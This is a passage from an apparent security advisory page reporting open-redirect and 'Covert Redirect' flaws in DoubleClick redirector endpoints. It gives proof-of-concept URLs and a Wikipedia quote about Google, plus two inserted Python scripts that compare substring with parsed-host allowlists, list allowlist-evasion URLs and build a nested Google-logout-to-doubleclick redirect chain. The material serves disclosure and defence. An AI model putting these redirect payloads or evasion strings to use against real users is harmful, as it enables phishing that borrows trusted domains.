<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 2:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>275260754;102106837;b?http://<wbr></wbr>zerodistance.cio.com</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>276304929;103445101;w?http://<wbr></wbr>tracker.marinsm.com/rd</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>275260754;102106837;b?http://<wbr></wbr>www.inzeed.com/kaleidoscope/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://ad.doubleclick.net/clk;<wbr></wbr>276304929;103445101;w?http://<wbr></wbr>www.tetraph.com/security</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs 3:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1OTI4NzkxMzM3&<wbr></wbr>forward=http%3A%2F%2Fib.adnxs.<wbr></wbr>com</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com%" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1ODY0NDM1NzM2&<wbr></wbr>forward=http%3A%2F%2Fwww.<wbr></wbr>reuters.com%</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1OTI4NzkxMzM3&<wbr></wbr>forward=http://www.inzeed.com/<wbr></wbr>kaleidoscope/</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://cm.g.doubleclick.net/<wbr></wbr>pixel?google_nid=rfi&google_<wbr></wbr>cm&google_sc&google_hm=<wbr></wbr>Njk4NjIwODk1ODY0NDM1NzM2&<wbr></wbr>forward=http://www.tetraph.<wbr></wbr>com/security</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">...</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Both redirector endpoints forward the browser to whatever URL is supplied in the request, so Google DoubleClick.net has Open Redirect vulnerabilities that spammers and phishers can misuse: a link that starts on a doubleclick.net domain is trusted by users and by many link filters, yet it can land anywhere.</span></div>
</div>
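The following script is an added example for this page, not code from the advisory or from Google. It parses the two redirector shapes shown above (`/clk;<ids>?<destination>` and `/pixel?...&forward=<destination>`), extracts the destination, and contrasts the substring-style allowlist that leaves a redirector open with a parse-based check. The `TRUSTED_HOSTS` set, the `EVASIONS` list and all function names are assumptions made for the example; the sample redirector URLs are the advisory's own.

```python
"""Classify DoubleClick-style redirector URLs and show why a substring
allowlist leaves a redirector open.

Added example for this page, not code from the advisory or from Google.
The two URL shapes come from the advisory; TRUSTED_HOSTS and EVASIONS are
constructed for the example.
"""
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts the redirector is assumed to forward to legitimately (assumption:
# the real list is not public; adnxs.com and reuters.com appear as
# forward= targets in the advisory's "vulnerable" URLs).
TRUSTED_HOSTS = {"adnxs.com", "reuters.com", "doubleclick.net"}


def extract_target(url: str) -> Optional[str]:
    """Return the destination embedded in a redirector URL, or None.

    Handles both shapes from the advisory:
      /clk;<ids>;b?<destination>          (destination is the whole query)
      /pixel?...&forward=<destination>    (destination is URL-encoded)
    """
    parts = urlsplit(url)
    if parts.path.startswith("/clk;"):
        return unquote(parts.query) or None
    forward = parse_qs(parts.query, keep_blank_values=True).get("forward")
    return forward[0] if forward else None


def host_of(url: str) -> str:
    """Lower-cased host component of a URL ('' when there is none)."""
    return (urlsplit(url).hostname or "").lower()


def naive_is_allowed(target: str) -> bool:
    """Substring allowlist: the kind of check that still leaves a redirector open."""
    return any(h in target for h in TRUSTED_HOSTS)


def strict_is_allowed(target: str) -> bool:
    """Parse first, then require http(s) and an exact or dotted-suffix host match."""
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https"):
        return False  # rejects javascript:, data: and scheme-relative //host
    host = host_of(target)
    return any(host == h or host.endswith("." + h) for h in TRUSTED_HOSTS)


def classify(url: str) -> str:
    """'no-target', 'allowed' or 'open-redirect' for one redirector URL."""
    target = extract_target(url)
    if target is None:
        return "no-target"
    return "allowed" if strict_is_allowed(target) else "open-redirect"


# Constructed targets: a substring check accepts all of them, a parsing check none.
EVASIONS = [
    "http://reuters.com@evil.example/",       # userinfo trick, real host is evil.example
    "http://reuters.com.evil.example/",       # look-alike subdomain
    "http://evil.example/?next=reuters.com",  # trusted name only in the query
    "//ib.adnxs.com.evil.example/",           # scheme-relative, no http(s)
]

if __name__ == "__main__":
    for u in (
        "http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/",
        "http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc"
        "&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com",
    ):
        print(classify(u), extract_target(u))
    for t in EVASIONS:
        print(naive_is_allowed(t), strict_is_allowed(t), t)
```

The point of the two checks is that an allowlist only helps when it is applied to the parsed host, not to the raw string; the four constructed targets all contain a trusted name and all resolve somewhere else. A redirector that accepts arbitrary destinations, as the PoC URLs above do, has no check at all.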
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.3)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=lfKHVGHWvk8&feature=youtu.be</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Similar
0-day vulnerabilities in related Google products have been reported by other
researchers before, and Google has patched some of them. BugTraq is a
full-disclosure moderated mailing list for the *detailed* discussion and
announcement of computer security vulnerabilities: what they are, how to
exploit them, and how to fix them. The following may be posted to the Bugtraq
list: (a) information on computer or network related security vulnerabilities
(UNIX, Windows NT, or any other); (b) exploit programs, scripts or detailed
procedures for the above; (c) patches, workarounds, fixes; (d) announcements,
advisories or warnings; (e) ideas, future plans or current work dealing with
computer/network security; (f) information regarding vendor contacts and
procedures; (g) individual experiences in dealing with the above vendors or
security organizations; (h) incident advisories or informational reporting;
(i) new or updated security tools. A large number of advisories in the
following web vulnerability classes have been published there: buffer
overflow, HTTP Response Splitting (CRLF), command injection, SQL injection,
phishing, cross-site scripting, CSRF, cyber-attack, unvalidated redirects and
forwards, information leakage, denial of service, file inclusion, weak
encryption, privilege escalation, directory traversal, HTML injection and
spam. It also publishes suggestions, advisories and solution details related
to Open Redirect vulnerabilities, together with cyber intelligence
recommendations.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(3) Google DoubleClick.net Can Adversely Affect Other Websites.</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">At the same time, Google DoubleClick.net can be used to perform a "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" against other websites such as Google, eBay and The New York Times. Those sites' redirect parameters accept doubleclick.net destinations as trusted, so nesting a DoubleClick open-redirect URL inside that parameter carries the user through the trusted host to an attacker-chosen page and bypasses the other websites' Open Redirect filters.</span></div>
</div>
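The script below is an added example for this section, not code from the advisory or from any of the sites it names. It models, without any network access, the chain that the (3.1) PoC further down exercises: a first-party `continue=` filter that checks only the immediate target passes a doubleclick.net URL, and that URL's `adurl=` parameter then forwards to the attacker. The `REDIRECTOR_PARAMS` table, the `FIRST_PARTY_ALLOWLIST` set, the hop limit and all function names are assumptions made for the example; only the parameter names `continue` and `adurl` come from the advisory's URLs.

```python
"""Model the Covert Redirect chain from the advisory without touching the network.

Added example for this page, not code from the advisory or from any site it
names. The redirector table, the allowlist and the sample URLs are
constructed; only the parameter names (continue, adurl) come from the advisory.
"""
from typing import List, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# Hosts a first-party "continue=" filter is assumed to accept (assumption).
FIRST_PARTY_ALLOWLIST = {"google.com", "doubleclick.net"}

# Constructed model of each redirector: host -> query parameter carrying the next hop.
REDIRECTOR_PARAMS = {
    "www.google.com": "continue",            # /accounts/Logout?continue=...
    "googleads.g.doubleclick.net": "adurl",  # /aclk?...&adurl=...
}


def host_of(url: str) -> str:
    """Lower-cased host component of a URL ('' when there is none)."""
    return (urlsplit(url).hostname or "").lower()


def in_allowlist(host: str) -> bool:
    """Exact or dotted-suffix match, the usual shape of a host allowlist."""
    return any(host == a or host.endswith("." + a) for a in FIRST_PARTY_ALLOWLIST)


def next_hop(url: str) -> Optional[str]:
    """Where the modelled redirector would send the browser, or None if final."""
    param = REDIRECTOR_PARAMS.get(host_of(url))
    if param is None:
        return None
    values = parse_qs(urlsplit(url).query).get(param)
    return values[0] if values else None


def first_hop_check(url: str) -> bool:
    """What a typical continue= filter does: validate only the immediate target."""
    target = next_hop(url)
    return target is not None and in_allowlist(host_of(target))


def resolve_chain(url: str, max_hops: int = 5) -> List[str]:
    """Follow modelled redirects; returns every URL visited, the last one final."""
    chain = [url]
    while len(chain) <= max_hops:
        nxt = next_hop(chain[-1])
        if nxt is None:
            break
        chain.append(nxt)
    return chain


def final_destination_check(url: str) -> bool:
    """Hardened variant: every hop, including the last, must stay on the allowlist."""
    return all(in_allowlist(host_of(hop)) for hop in resolve_chain(url))


def build_covert_redirect(attacker_url: str) -> str:
    """Nest an open-redirector URL inside the first-party continue= parameter.

    urlencode() takes care of the double encoding: the inner adurl= value is
    encoded once for the doubleclick URL and again for the continue= value.
    """
    inner = "http://googleads.g.doubleclick.net/aclk?" + urlencode(
        {"sa": "L", "adurl": attacker_url})
    return "https://www.google.com/accounts/Logout?" + urlencode(
        {"service": "wise", "continue": inner})


if __name__ == "__main__":
    poc = build_covert_redirect("http://www.tetraph.com/security")
    print(first_hop_check(poc))          # allowlist passes: doubleclick.net is trusted
    print(final_destination_check(poc))  # chain check fails: ends on tetraph.com
    for hop in resolve_chain(poc):
        print(" ->", host_of(hop))
```

The design point is that `first_hop_check` is correct on its own terms and is still bypassed, because the allowlisted host is itself an open redirector. A first party cannot in general resolve third-party chains server-side, so the practical fixes are to keep open redirectors off the allowlist, to allow exact URLs or signed destinations rather than whole domains, and for the redirector operator to close the open redirect.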
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><b>(3.1) </b></span><b>Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Domain:</b></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">google.com</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"Google
is an American multinational technology company specializing in
Internet-related services and products. These include online advertising
technologies, search, cloud computing, and software. Most of its
profits are derived from AdWords, an online advertising service that
places advertising near the list of search results. Google was founded
by Larry Page and Sergey Brin while they were Ph.D. students at Stanford
University. Together they own about 14 percent of its shares but
control 56 percent of the stockholder voting power through supervoting
stock. They incorporated Google as a privately held company on September
4, 1998. An initial public offering followed on August 19, 2004. Its
mission statement from the outset was "to organize the world's
information and make it universally accessible and useful," and its
unofficial slogan was "Don't be evil". In 2004, Google moved to its new
headquarters in Mountain View, California, nicknamed the Googleplex. The
corporation has been estimated to run more than one million servers in
data centers around the world (as of 2007). It processes over one
billion search requests and about 24 petabytes of user-generated data
each day (as of 2009). In December 2013, Alexa listed google.com as the
most visited website in the world. Numerous Google sites in other
languages figure in the top one hundred, as do several other
Google-owned sites such as YouTube and Blogger. Its market dominance has
led to prominent media coverage, including criticism of the company
over issues such as search neutrality, copyright, censorship, and
privacy." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
